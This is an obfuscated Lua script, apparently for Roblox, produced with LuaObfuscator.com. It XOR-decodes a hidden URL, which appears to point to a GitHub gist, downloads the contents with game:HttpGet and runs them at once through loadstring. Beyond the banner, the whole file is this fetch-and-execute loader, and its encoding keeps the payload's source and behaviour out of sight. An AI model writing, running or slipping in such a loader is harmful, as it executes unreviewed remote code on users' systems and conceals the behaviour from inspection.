--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v9,v10)local v11={};for v12=1, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + (3 -2) + 0 + 0)),v1(v2(v10,1 + ((v12-(1 + 0))% #v10),1 + ((v12-1)% #v10) + 1)))%(54 + 202)));end return v5(v11);end;loadstring(game:HttpGet(v8("\115\4\14\168\166\225\168\52\23\19\171\161\245\224\114\4\18\173\183\174\244\126\2\25\183\187\175\226\117\4\84\187\186\182\168\121\28\31\189\189\179\239\115\95\76\233\228\232\177\44\69\79\189\237\237\179\41\17\30\189\226\238\179\47\70\30\224\182\233\227\35\72\78\239\237\227\168\105\17\13\247\179\184\191\127\18\74\185\231\236\178\47\68\30\225\176\189\183\127\65\25\185\224\185\177\122\19\76\232\226\189\181\35\73\28\189\227\232\225\126\19\85\191\188\168\243\125\25\22\189\228\245\243\99\4","\27\112\122\216\213\219\135")))();
